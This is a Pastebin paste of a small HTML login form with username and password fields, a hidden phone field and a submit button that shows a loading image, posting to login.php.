Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <form id="formaction" action="login.php" method="post">
- <table class="activity" style="background-color:;">
- <tbody><tr>
- <td class="labels">Username</td><td><input type="text" name="login" class="usertext" size="15" value=""></td>
- </tr>
- <tr>
- <td class="labels">Password</td><td><input type="password" name="pass" class="usertext" size="15" value=""></td>
- </tr>
- <tr bgcolor=""><td colspan="2" style="height:8px;"></td></tr>
- <tr>
- <td width="80"><div style="font-size:10px;"> </div></td>
- <td align="right">
- <input id="tsubmit" class="login_button" type="submit" style="" value="" onclick="document.getElementById('tsubmit').style.display='none'; document.getElementById('loadeux').style.display=''; document.getElementById('formaction').submit();">
- <img id="loadeux" src="./Login_files/loader.gif" style="display:none;position:relative;top:-5px;">
- </tr>
- </tbody></table>
-
- <input type="hidden" name="phone" id="phone" value=''>
- <input type="submit" style="visibility:hidden;">
- </form>
Advertisement
Add Comment
Please, Sign In to add comment